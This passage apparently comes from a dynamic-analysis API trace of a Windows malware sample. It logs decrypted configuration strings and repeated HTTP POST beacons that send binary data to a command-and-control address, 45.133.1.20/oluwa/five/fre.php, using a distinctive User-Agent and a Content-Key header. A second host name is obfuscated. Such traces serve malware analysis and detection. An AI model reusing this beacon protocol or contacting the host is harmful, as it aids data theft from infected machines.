(hKey=0x6ad560) returned 1 [0316.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.172] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0316.172] GetProcessHeap () returned 0x6a0000 [0316.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0316.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.173] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0316.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.174] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0316.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.176] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0316.177] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.177] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0316.177] GetProcessHeap () returned 0x6a0000 [0316.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0316.177] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0316.177] GetProcessHeap () returned 0x6a0000 [0316.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0316.178] socket (af=2, type=1, protocol=6) returned 0xc24 [0316.178] connect (s=0xc24, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0316.201] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0316.201] GetProcessHeap () returned 0x6a0000 [0316.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0316.201] GetProcessHeap () returned 0x6a0000 [0316.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0316.202] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.203] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0316.203] GetProcessHeap () returned 0x6a0000 [0316.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dfb68 [0316.203] GetProcessHeap () returned 0x6a0000 [0316.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0316.204] GetProcessHeap () returned 0x6a0000 [0316.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0316.204] GetProcessHeap () returned 0x6a0000 [0316.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0316.205] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.206] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0316.206] GetProcessHeap () returned 0x6a0000 [0316.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0316.206] GetProcessHeap () returned 0x6a0000 [0316.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0316.207] send (s=0xc24, buf=0x6bd460*, len=242, flags=0) returned 242 [0316.207] send (s=0xc24, buf=0x6bb998*, len=159, flags=0) returned 159 [0316.207] GetProcessHeap () returned 0x6a0000 [0316.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0316.208] recv (in: s=0xc24, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0316.292] GetProcessHeap () returned 0x6a0000 [0316.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0316.293] GetProcessHeap () returned 0x6a0000 [0316.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0316.294] GetProcessHeap () returned 0x6a0000 [0316.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dfb68 | out: hHeap=0x6a0000) returned 1 [0316.294] GetProcessHeap () returned 0x6a0000 [0316.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0316.295] closesocket (s=0xc24) returned 0 [0316.295] GetProcessHeap () returned 0x6a0000 [0316.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0316.295] GetProcessHeap () returned 0x6a0000 [0316.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0316.296] GetProcessHeap () returned 0x6a0000 [0316.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0316.296] GetProcessHeap () returned 0x6a0000 [0316.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0316.297] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1988) returned 0xc24 [0316.298] Sleep (dwMilliseconds=0xea60) [0316.300] GetProcessHeap () returned 0x6a0000 [0316.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0316.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.301] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.306] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0316.312] GetProcessHeap () returned 0x6a0000 [0316.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0316.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.313] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0316.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.314] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.364] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.365] GetProcessHeap () returned 0x6a0000 [0316.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0316.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.369] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0316.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.374] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0316.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.379] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0316.381] GetProcessHeap () returned 0x6a0000 [0316.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0316.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.384] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0316.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.391] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0316.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.420] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0316.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.421] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0316.421] GetProcessHeap () returned 0x6a0000 [0316.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0316.421] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0316.421] GetProcessHeap () returned 0x6a0000 [0316.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0316.421] GetProcessHeap () returned 0x6a0000 [0316.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0316.422] GetProcessHeap () returned 0x6a0000 [0316.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0316.422] GetProcessHeap () returned 0x6a0000 [0316.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0316.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.423] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.432] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0316.438] GetProcessHeap () returned 0x6a0000 [0316.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0316.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.439] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0316.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.440] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.441] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.441] GetProcessHeap () returned 0x6a0000 [0316.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0316.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.442] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0316.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.443] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0316.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.444] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0316.444] GetProcessHeap () returned 0x6a0000 [0316.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0316.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.445] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0316.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.446] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0316.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.447] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0316.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.448] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0316.448] GetProcessHeap () returned 0x6a0000 [0316.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0316.448] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0316.448] GetProcessHeap () returned 0x6a0000 [0316.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0316.448] socket (af=2, type=1, protocol=6) returned 0xc28 [0316.448] connect (s=0xc28, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0316.474] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0316.474] GetProcessHeap () returned 0x6a0000 [0316.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0316.474] GetProcessHeap () returned 0x6a0000 [0316.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0316.475] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.475] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0316.476] GetProcessHeap () returned 0x6a0000 [0316.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df7a8 [0316.476] GetProcessHeap () returned 0x6a0000 [0316.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0316.476] GetProcessHeap () returned 0x6a0000 [0316.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0316.476] GetProcessHeap () returned 0x6a0000 [0316.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0316.477] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.478] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0316.478] GetProcessHeap () returned 0x6a0000 [0316.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0316.478] GetProcessHeap () returned 0x6a0000 [0316.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0316.479] send (s=0xc28, buf=0x6bd460*, len=242, flags=0) returned 242 [0316.480] send (s=0xc28, buf=0x6bb998*, len=159, flags=0) returned 159 [0316.480] GetProcessHeap () returned 0x6a0000 [0316.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0316.480] recv (in: s=0xc28, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0316.556] GetProcessHeap () returned 0x6a0000 [0316.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0316.557] GetProcessHeap () returned 0x6a0000 [0316.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0316.558] GetProcessHeap () returned 0x6a0000 [0316.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df7a8 | out: hHeap=0x6a0000) returned 1 [0316.561] GetProcessHeap () returned 0x6a0000 [0316.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0316.561] closesocket (s=0xc28) returned 0 [0316.562] GetProcessHeap () returned 0x6a0000 [0316.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0316.562] GetProcessHeap () returned 0x6a0000 [0316.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0316.563] GetProcessHeap () returned 0x6a0000 [0316.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0316.564] GetProcessHeap () returned 0x6a0000 [0316.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0316.564] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1990) returned 0xc28 [0316.567] Sleep (dwMilliseconds=0xea60) [0316.568] GetProcessHeap () returned 0x6a0000 [0316.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0316.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.584] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.610] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0316.619] GetProcessHeap () returned 0x6a0000 [0316.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0316.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.621] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0316.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.623] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.624] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.624] GetProcessHeap () returned 0x6a0000 [0316.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0316.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.626] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0316.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.627] CryptDestroyKey (hKey=0x6ad520) returned 1 [0316.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.628] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0316.628] GetProcessHeap () returned 0x6a0000 [0316.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0316.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.631] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0316.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.632] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0316.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.633] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0316.634] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.635] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0316.635] GetProcessHeap () returned 0x6a0000 [0316.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0316.635] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0316.635] GetProcessHeap () returned 0x6a0000 [0316.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0316.636] GetProcessHeap () returned 0x6a0000 [0316.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0316.636] GetProcessHeap () returned 0x6a0000 [0316.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0316.636] GetProcessHeap () returned 0x6a0000 [0316.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0316.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.638] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.645] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0316.656] GetProcessHeap () returned 0x6a0000 [0316.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0316.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.659] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0316.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.660] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.662] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.662] GetProcessHeap () returned 0x6a0000 [0316.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0316.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.665] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0316.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.666] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0316.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.668] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0316.668] GetProcessHeap () returned 0x6a0000 [0316.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0316.668] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.669] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0316.670] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.670] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0316.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.672] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0316.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.673] StrStrA 